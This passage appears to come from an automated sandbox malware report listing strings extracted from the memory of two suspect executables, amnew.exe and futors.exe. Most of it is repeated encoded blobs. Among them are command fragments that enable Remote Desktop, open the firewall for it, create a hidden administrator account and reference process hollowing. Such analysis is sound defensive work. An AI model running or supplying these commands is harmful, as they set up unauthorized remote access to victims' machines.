0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                      Source: amnew.exeString found in binary or memory: net start termservice
                                      Source: amnew.exe, 0000000D.00000000.1311776357.0000000000991000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: net start termservice
                                      Source: amnew.exe, 0000000D.00000000.1311776357.0000000000991000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setce0b89c831d45810d856da111e87cdbfc1ec479e5342a25940592acf24703eb297fe1526eb5d0adb2c58ee424dc8c89bd08e41OX62IhKuFI7qGQCjPgu0N4GqJCji5 TWIzZeejLghCVm1Lx=PWTzJy==WCPm9FWqLWQtaO==NWKtaO==QX21JRnjQ McGx==1rK191LwDcYXTN==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqV56o1U==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydSVPi59EM5DLhezvBe2naP1GvW7Gi lTY5q==WqKu06QlFAaAAvMGLBbHLz3uO3u7W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqerKvWEzpEpL WLywW1Le4NP=W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydR0ji4wz LjZh2DPtfw==LZKUOTLNMabzMRnuMN==ZIux y==WIYUSy==T4KVc0F7frB7e6F7d7B70q 701x7eKB7f0T71KP701N7dLN7d627enP=07ymWA7h4wA1SZnefzZfeGnY07ymWA7h4wz=06mq A7h4wz=1Ht=1Xt=1Xx=1XB=V0uq9e==cLG1 BqsDm==cLG1 FO3Doa=117m1Kmt06QleLByd1CqgqaxN7u28UXXRKB+RKF+N5qtaUfm4dPoMChsKA==hE==LrKv8VS6RU==e67m9EywE98d6Dm=c6Kz9kXpEpLnTDnhT6K1QkHX3N2eO0bogDPoVWVc2A==WLywW1Le4KUa8Dv2SZOCRZSdMSbf8E47fjO=S1Oq kG=U6uA EXv5SwYCBn71d==TZCGSy==WKuvWEGdMSYc8UzegEe=TKYkaEavAvgeSd==SZOIODNxSEaXQMAMTTDQfjfVhQ==Sqa1WEXjRM8dTUy=VqYzaEarW6Yx8EawS6Yu90TsX6avOEXjRM8dTUy=OHtzJxSYF fXIN==eqx=f6x=S6YvaEXr6s4N9UraRfvogWnQ11ydeqRA1qYz9Q3hQNUaIvr8e0Pp2Gvo5XXpNV1yNWPuIQ2qFUeE907XRM8TFRHef0vqf2bQ106qQlCrd7yuIUTe6wH0CDV7eTO4LmH84KBeQBCrc0mm9kHqRJ3bKkPLN0ar6wYn8zRJhUvgRir83LyocZOmfKaw9gasQTUe8zRogEDg1WQDskXGFUduIQ2qDI3=NWPOze==R7Ck h2uNqexWu==S6YvaEXr6s4N9UraRfvcfHri10KdfJmAdmY5IVf06o4f60ziOUPteGLkO66g1ZR=W5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6KZZifEPV2XzEO0YhZHOAd1q2aEXvLcImTN==S6Yu FXXRNMHSTRa00ykWEXjRSki5jjheTZqfHvo37OXfqe9g1dxJRKwFtXVHw7UOS2=N1Kv8UPsRwXmW5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6PTVegDPfYmbaP069S3 TXJyQQDzTKKUyNYm=W5aUSCXKPuQo6kHneZrO2XGmCHC9W5WDfqakWVP IcIs5TDtdUHreGvVNJWl1JWAXqalWUaGJq==ZHpxJBC=TKKnVVXp6vQe8EHeej8uOl8IP1KrdKW5c0YvTKKnVVXp6vQe8EHeej8uOlbIP1KrdKW5c0YvW4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7BhQjT ITYr7jLjgCTgfnDf261=WLywWFXg6u8a6TK=OnpyLO==OnpzJe==OnpyKe==OnpzKO==S7Kz kXr6uMU5Tn ZE==Qnd7erKvWEzpEpLnTU8aN6hhKrGi 0vo3MAlCzZbLz3keSq9KmpnGgDX3M4e60LPLAybMiO7PKSoKD==LmNhOVjm6sL=KmpnGgDvRM7 KGNnFy==WKY4WVLw3wYl6zVahDO=N0K5WUPY6woo6krkeDfehSroP0YrfJWEc03vWUSdDK2i6DK6Ld==Kk==e672aETs6S7 FUC6OUKbPA==e7F u==equvWEaqU6K6Vkae5cT NDvUe0PV0FroP0ur0ZR=OHpxJBCXEJn=OHpxJBCXE L=OHpxJBCXE P=OHpxJBCXES1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termser
                                      Source: amnew.exe, 0000000D.00000002.1325500672.0000000000991000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: net start termservice
                                      Source: amnew.exe, 0000000D.00000002.1325500672.0000000000991000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setce0b89c831d45810d856da111e87cdbfc1ec479e5342a25940592acf24703eb297fe1526eb5d0adb2c58ee424dc8c89bd08e41OX62IhKuFI7qGQCjPgu0N4GqJCji5 TWIzZeejLghCVm1Lx=PWTzJy==WCPm9FWqLWQtaO==NWKtaO==QX21JRnjQ McGx==1rK191LwDcYXTN==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqV56o1U==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydSVPi59EM5DLhezvBe2naP1GvW7Gi lTY5q==WqKu06QlFAaAAvMGLBbHLz3uO3u7W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqerKvWEzpEpL WLywW1Le4NP=W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydR0ji4wz LjZh2DPtfw==LZKUOTLNMabzMRnuMN==ZIux y==WIYUSy==T4KVc0F7frB7e6F7d7B70q 701x7eKB7f0T71KP701N7dLN7d627enP=07ymWA7h4wA1SZnefzZfeGnY07ymWA7h4wz=06mq A7h4wz=1Ht=1Xt=1Xx=1XB=V0uq9e==cLG1 BqsDm==cLG1 FO3Doa=117m1Kmt06QleLByd1CqgqaxN7u28UXXRKB+RKF+N5qtaUfm4dPoMChsKA==hE==LrKv8VS6RU==e67m9EywE98d6Dm=c6Kz9kXpEpLnTDnhT6K1QkHX3N2eO0bogDPoVWVc2A==WLywW1Le4KUa8Dv2SZOCRZSdMSbf8E47fjO=S1Oq kG=U6uA EXv5SwYCBn71d==TZCGSy==WKuvWEGdMSYc8UzegEe=TKYkaEavAvgeSd==SZOIODNxSEaXQMAMTTDQfjfVhQ==Sqa1WEXjRM8dTUy=VqYzaEarW6Yx8EawS6Yu90TsX6avOEXjRM8dTUy=OHtzJxSYF fXIN==eqx=f6x=S6YvaEXr6s4N9UraRfvogWnQ11ydeqRA1qYz9Q3hQNUaIvr8e0Pp2Gvo5XXpNV1yNWPuIQ2qFUeE907XRM8TFRHef0vqf2bQ106qQlCrd7yuIUTe6wH0CDV7eTO4LmH84KBeQBCrc0mm9kHqRJ3bKkPLN0ar6wYn8zRJhUvgRir83LyocZOmfKaw9gasQTUe8zRogEDg1WQDskXGFUduIQ2qDI3=NWPOze==R7Ck h2uNqexWu==S6YvaEXr6s4N9UraRfvcfHri10KdfJmAdmY5IVf06o4f60ziOUPteGLkO66g1ZR=W5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6KZZifEPV2XzEO0YhZHOAd1q2aEXvLcImTN==S6Yu FXXRNMHSTRa00ykWEXjRSki5jjheTZqfHvo37OXfqe9g1dxJRKwFtXVHw7UOS2=N1Kv8UPsRwXmW5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6PTVegDPfYmbaP069S3 TXJyQQDzTKKUyNYm=W5aUSCXKPuQo6kHneZrO2XGmCHC9W5WDfqakWVP IcIs5TDtdUHreGvVNJWl1JWAXqalWUaGJq==ZHpxJBC=TKKnVVXp6vQe8EHeej8uOl8IP1KrdKW5c0YvTKKnVVXp6vQe8EHeej8uOlbIP1KrdKW5c0YvW4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7BhQjT ITYr7jLjgCTgfnDf261=WLywWFXg6u8a6TK=OnpyLO==OnpzJe==OnpyKe==OnpzKO==S7Kz kXr6uMU5Tn ZE==Qnd7erKvWEzpEpLnTU8aN6hhKrGi 0vo3MAlCzZbLz3keSq9KmpnGgDX3M4e60LPLAybMiO7PKSoKD==LmNhOVjm6sL=KmpnGgDvRM7 KGNnFy==WKY4WVLw3wYl6zVahDO=N0K5WUPY6woo6krkeDfehSroP0YrfJWEc03vWUSdDK2i6DK6Ld==Kk==e672aETs6S7 FUC6OUKbPA==e7F u==equvWEaqU6K6Vkae5cT NDvUe0PV0FroP0ur0ZR=OHpxJBCXEJn=OHpxJBCXE L=OHpxJBCXE P=OHpxJBCXES1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termser
                                      Source: amnew.exe, 0000000D.00000003.1322682890.0000000001106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: net start termservice
                                      Source: amnew.exe, 0000000D.00000003.1322682890.0000000001106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hE==LrKv8VS6RU==e67m9EywE98d6Dm=c6Kz9kXpEpLnTDnhT6K1QkHX3N2eO0bogDPoVWVc2A==WLywW1Le4KUa8Dv2SZOCRZSdMSbf8E47fjO=S1Oq kG=U6uA EXv5SwYCBn71d==TZCGSy==WKuvWEGdMSYc8UzegEe=TKYkaEavAvgeSd==SZOIODNxSEaXQMAMTTDQfjfVhQ==Sqa1WEXjRM8dTUy=VqYzaEarW6Yx8EawS6Yu90TsX6avOEXjRM8dTUy=OHtzJxSYF fXIN==eqx=f6x=S6YvaEXr6s4N9UraRfvogWnQ11ydeqRA1qYz9Q3hQNUaIvr8e0Pp2Gvo5XXpNV1yNWPuIQ2qFUeE907XRM8TFRHef0vqf2bQ106qQlCrd7yuIUTe6wH0CDV7eTO4LmH84KBeQBCrc0mm9kHqRJ3bKkPLN0ar6wYn8zRJhUvgRir83LyocZOmfKaw9gasQTUe8zRogEDg1WQDskXGFUduIQ2qDI3=NWPOze==R7Ck h2uNqexWu==S6YvaEXr6s4N9UraRfvcfHri10KdfJmAdmY5IVf06o4f60ziOUPteGLkO66g1ZR=W5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6KZZifEPV2XzEO0YhZHOAd1q2aEXvLcImTN==S6Yu FXXRNMHSTRa00ykWEXjRSki5jjheTZqfHvo37OXfqe9g1dxJRKwFtXVHw7UOS2=N1Kv8UPsRwXmW5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6PTVegDPfYmbaP069S3 TXJyQQDzTKKUyNYm=W5aUSCXKPuQo6kHneZrO2XGmCHC9W5WDfqakWVP IcIs5TDtdUHreGvVNJWl1JWAXqalWUaGJq==ZHpxJBC=TKKnVVXp6vQe8EHeej8uOl8IP1KrdKW5c0YvTKKnVVXp6vQe8EHeej8uOlbIP1KrdKW5c0YvW4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7BhQjT ITYr7jLjgCTgfnDf261=WLywWFXg6u8a6TK=OnpyLO==OnpzJe==OnpyKe==OnpzKO==S7Kz kXr6uMU5Tn ZE==Qnd7erKvWEzpEpLnTU8aN6hhKrGi 0vo3MAlCzZbLz3keSq9KmpnGgDX3M4e60LPLAybMiO7PKSoKD==LmNhOVjm6sL=KmpnGgDvRM7 KGNnFy==WKY4WVLw3wYl6zVahDO=N0K5WUPY6woo6krkeDfehSroP0YrfJWEc03vWUSdDK2i6DK6Ld==Kk==e672aETs6S7 FUC6OUKbPA==e7F u==equvWEaqU6K6Vkae5cT NDvUe0PV0FroP0ur0ZR=OHpxJBCXEJn=OHpxJBCXE L=OHpxJBCXE P=OHpxJBCXES1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= autonet start termservice" /add /y" "net user "" /addnet localgroup "Administrators" "'" SET PasswordExpires=FALSEWMIC USERACCOUNT WHERE "Name = ''" SET Passwordchangeable=FALSEw01--E'' -DestinationPath 'powershell -Command Expand-Archive -Path '%d
                                      Source: futors.exeString found in binary or memory: net start termservice
                                      Source: futors.exe, 0000000E.00000002.1325607178.0000000000431000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: net start termservice
                                      Source: futors.exe, 0000000E.00000002.1325607178.0000000000431000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setce0b89c831d45810d856da111e87cdbfc1ec479e5342a25940592acf24703eb297fe1526eb5d0adb2c58ee424dc8c89bd08e41OX62IhKuFI7qGQCjPgu0N4GqJCji5 TWIzZeejLghCVm1Lx=PWTzJy==WCPm9FWqLWQtaO==NWKtaO==QX21JRnjQ McGx==1rK191LwDcYXTN==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqV56o1U==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydSVPi59EM5DLhezvBe2naP1GvW7Gi lTY5q==WqKu06QlFAaAAvMGLBbHLz3uO3u7W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqerKvWEzpEpL WLywW1Le4NP=W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydR0ji4wz LjZh2DPtfw==LZKUOTLNMabzMRnuMN==ZIux y==WIYUSy==T4KVc0F7frB7e6F7d7B70q 701x7eKB7f0T71KP701N7dLN7d627enP=07ymWA7h4wA1SZnefzZfeGnY07ymWA7h4wz=06mq A7h4wz=1Ht=1Xt=1Xx=1XB=V0uq9e==cLG1 BqsDm==cLG1 FO3Doa=117m1Kmt06QleLByd1CqgqaxN7u28UXXRKB+RKF+N5qtaUfm4dPoMChsKA==hE==LrKv8VS6RU==e67m9EywE98d6Dm=c6Kz9kXpEpLnTDnhT6K1QkHX3N2eO0bogDPoVWVc2A==WLywW1Le4KUa8Dv2SZOCRZSdMSbf8E47fjO=S1Oq kG=U6uA EXv5SwYCBn71d==TZCGSy==WKuvWEGdMSYc8UzegEe=TKYkaEavAvgeSd==SZOIODNxSEaXQMAMTTDQfjfVhQ==Sqa1WEXjRM8dTUy=VqYzaEarW6Yx8EawS6Yu90TsX6avOEXjRM8dTUy=OHtzJxSYF fXIN==eqx=f6x=S6YvaEXr6s4N9UraRfvogWnQ11ydeqRA1qYz9Q3hQNUaIvr8e0Pp2Gvo5XXpNV1yNWPuIQ2qFUeE907XRM8TFRHef0vqf2bQ106qQlCrd7yuIUTe6wH0CDV7eTO4LmH84KBeQBCrc0mm9kHqRJ3bKkPLN0ar6wYn8zRJhUvgRir83LyocZOmfKaw9gasQTUe8zRogEDg1WQDskXGFUduIQ2qDI3=NWPOze==R7Ck h2uNqexWu==S6YvaEXr6s4N9UraRfvcfHri10KdfJmAdmY5IVf06o4f60ziOUPteGLkO66g1ZR=W5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6KZZifEPV2XzEO0YhZHOAd1q2aEXvLcImTN==S6Yu FXXRNMHSTRa00ykWEXjRSki5jjheTZqfHvo37OXfqe9g1dxJRKwFtXVHw7UOS2=N1Kv8UPsRwXmW5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6PTVegDPfYmbaP069S3 TXJyQQDzTKKUyNYm=W5aUSCXKPuQo6kHneZrO2XGmCHC9W5WDfqakWVP IcIs5TDtdUHreGvVNJWl1JWAXqalWUaGJq==ZHpxJBC=TKKnVVXp6vQe8EHeej8uOl8IP1KrdKW5c0YvTKKnVVXp6vQe8EHeej8uOlbIP1KrdKW5c0YvW4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7BhQjT ITYr7jLjgCTgfnDf261=WLywWFXg6u8a6TK=OnpyLO==OnpzJe==OnpyKe==OnpzKO==S7Kz kXr6uMU5Tn ZE==Qnd7erKvWEzpEpLnTU8aN6hhKrGi 0vo3MAlCzZbLz3keSq9KmpnGgDX3M4e60LPLAybMiO7PKSoKD==LmNhOVjm6sL=KmpnGgDvRM7 KGNnFy==WKY4WVLw3wYl6zVahDO=N0K5WUPY6woo6krkeDfehSroP0YrfJWEc03vWUSdDK2i6DK6Ld==Kk==e672aETs6S7 FUC6OUKbPA==e7F u==equvWEaqU6K6Vkae5cT NDvUe0PV0FroP0ur0ZR=OHpxJBCXEJn=OHpxJBCXE L=OHpxJBCXE P=OHpxJBCXES1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termser
                                      Source: futors.exe, 0000000E.00000000.1322997240.0000000000431000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: net start termservice
                                      Source: futors.exe, 0000000E.00000000.1322997240.0000000000431000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setce0b89c831d45810d856da111e87cdbfc1ec479e5342a25940592acf24703eb297fe1526eb5d0adb2c58ee424dc8c89bd08e41OX62IhKuFI7qGQCjPgu0N4GqJCji5 TWIzZeejLghCVm1Lx=PWTzJy==WCPm9FWqLWQtaO==NWKtaO==QX21JRnjQ McGx==1rK191LwDcYXTN==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqV56o1U==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydSVPi59EM5DLhezvBe2naP1GvW7Gi lTY5q==WqKu06QlFAaAAvMGLBbHLz3uO3u7W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqerKvWEzpEpL WLywW1Le4NP=W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydR0ji4wz LjZh2DPtfw==LZKUOTLNMabzMRnuMN==ZIux y==WIYUSy==T4KVc0F7frB7e6F7d7B70q 701x7eKB7f0T71KP701N7dLN7d627enP=07ymWA7h4wA1SZnefzZfeGnY07ymWA7h4wz=06mq A7h4wz=1Ht=1Xt=1Xx=1XB=V0uq9e==cLG1 BqsDm==cLG1 FO3Doa=117m1Kmt06QleLByd1CqgqaxN7u28UXXRKB+RKF+N5qtaUfm4dPoMChsKA==hE==LrKv8VS6RU==e67m9EywE98d6Dm=c6Kz9kXpEpLnTDnhT6K1QkHX3N2eO0bogDPoVWVc2A==WLywW1Le4KUa8Dv2SZOCRZSdMSbf8E47fjO=S1Oq kG=U6uA EXv5SwYCBn71d==TZCGSy==WKuvWEGdMSYc8UzegEe=TKYkaEavAvgeSd==SZOIODNxSEaXQMAMTTDQfjfVhQ==Sqa1WEXjRM8dTUy=VqYzaEarW6Yx8EawS6Yu90TsX6avOEXjRM8dTUy=OHtzJxSYF fXIN==eqx=f6x=S6YvaEXr6s4N9UraRfvogWnQ11ydeqRA1qYz9Q3hQNUaIvr8e0Pp2Gvo5XXpNV1yNWPuIQ2qFUeE907XRM8TFRHef0vqf2bQ106qQlCrd7yuIUTe6wH0CDV7eTO4LmH84KBeQBCrc0mm9kHqRJ3bKkPLN0ar6wYn8zRJhUvgRir83LyocZOmfKaw9gasQTUe8zRogEDg1WQDskXGFUduIQ2qDI3=NWPOze==R7Ck h2uNqexWu==S6YvaEXr6s4N9UraRfvcfHri10KdfJmAdmY5IVf06o4f60ziOUPteGLkO66g1ZR=W5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6KZZifEPV2XzEO0YhZHOAd1q2aEXvLcImTN==S6Yu FXXRNMHSTRa00ykWEXjRSki5jjheTZqfHvo37OXfqe9g1dxJRKwFtXVHw7UOS2=N1Kv8UPsRwXmW5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6PTVegDPfYmbaP069S3 TXJyQQDzTKKUyNYm=W5aUSCXKPuQo6kHneZrO2XGmCHC9W5WDfqakWVP IcIs5TDtdUHreGvVNJWl1JWAXqalWUaGJq==ZHpxJBC=TKKnVVXp6vQe8EHeej8uOl8IP1KrdKW5c0YvTKKnVVXp6vQe8EHeej8uOlbIP1KrdKW5c0YvW4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7BhQjT ITYr7jLjgCTgfnDf261=WLywWFXg6u8a6TK=OnpyLO==OnpzJe==OnpyKe==OnpzKO==S7Kz kXr6uMU5Tn ZE==Qnd7erKvWEzpEpLnTU8aN6hhKrGi 0vo3MAlCzZbLz3keSq9KmpnGgDX3M4e60LPLAybMiO7PKSoKD==LmNhOVjm6sL=KmpnGgDvRM7 KGNnFy==WKY4WVLw3wYl6zVahDO=N0K5WUPY6woo6krkeDfehSroP0YrfJWEc03vWUSdDK2i6DK6Ld==Kk==e672aETs6S7 FUC6OUKbPA==e7F u==equvWEaqU6K6Vkae5cT NDvUe0PV0FroP0ur0ZR=OHpxJBCXEJn=OHpxJBCXE L=OHpxJBCXE P=OHpxJBCXES1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termser
                                      Source: futors.exe, 0000000F.00000000.1324663777.0000000000431000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: net start termservice
                                      Source: futors.exe, 0000000F.00000000.1324663777.0000000000431000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setce0b89c831d45810d856da111e87cdbfc1ec479e5342a25940592acf24703eb297fe1526eb5d0adb2c58ee424dc8c89bd08e41OX62IhKuFI7qGQCjPgu0N4GqJCji5 TWIzZeejLghCVm1Lx=PWTzJy==WCPm9FWqLWQtaO==NWKtaO==QX21JRnjQ McGx==1rK191LwDcYXTN==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqV56o1U==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydSVPi59EM5DLhezvBe2naP1GvW7Gi lTY5q==WqKu06QlFAaAAvMGLBbHLz3uO3u7W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqerKvWEzpEpL WLywW1Le4NP=W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydR0ji4wz LjZh2DPtfw==LZKUOTLNMabzMRnuMN==ZIux y==WIYUSy==T4KVc0F7frB7e6F7d7B70q 701x7eKB7f0T71KP701N7dLN7d627enP=07ymWA7h4wA1SZnefzZfeGnY07ymWA7h4wz=06mq A7h4wz=1Ht=1Xt=1Xx=1XB=V0uq9e==cLG1 BqsDm==cLG1 FO3Doa=117m1Kmt06QleLByd1CqgqaxN7u28UXXRKB+RKF+N5qtaUfm4dPoMChsKA==hE==LrKv8VS6RU==e67m9EywE98d6Dm=c6Kz9kXpEpLnTDnhT6K1QkHX3N2eO0bogDPoVWVc2A==WLywW1Le4KUa8Dv2SZOCRZSdMSbf8E47fjO=S1Oq kG=U6uA EXv5SwYCBn71d==TZCGSy==WKuvWEGdMSYc8UzegEe=TKYkaEavAvgeSd==SZOIODNxSEaXQMAMTTDQfjfVhQ==Sqa1WEXjRM8dTUy=VqYzaEarW6Yx8EawS6Yu90TsX6avOEXjRM8dTUy=OHtzJxSYF fXIN==eqx=f6x=S6YvaEXr6s4N9UraRfvogWnQ11ydeqRA1qYz9Q3hQNUaIvr8e0Pp2Gvo5XXpNV1yNWPuIQ2qFUeE907XRM8TFRHef0vqf2bQ106qQlCrd7yuIUTe6wH0CDV7eTO4LmH84KBeQBCrc0mm9kHqRJ3bKkPLN0ar6wYn8zRJhUvgRir83LyocZOmfKaw9gasQTUe8zRogEDg1WQDskXGFUduIQ2qDI3=NWPOze==R7Ck h2uNqexWu==S6YvaEXr6s4N9UraRfvcfHri10KdfJmAdmY5IVf06o4f60ziOUPteGLkO66g1ZR=W5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6KZZifEPV2XzEO0YhZHOAd1q2aEXvLcImTN==S6Yu FXXRNMHSTRa00ykWEXjRSki5jjheTZqfHvo37OXfqe9g1dxJRKwFtXVHw7UOS2=N1Kv8UPsRwXmW5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6PTVegDPfYmbaP069S3 TXJyQQDzTKKUyNYm=W5aUSCXKPuQo6kHneZrO2XGmCHC9W5WDfqakWVP 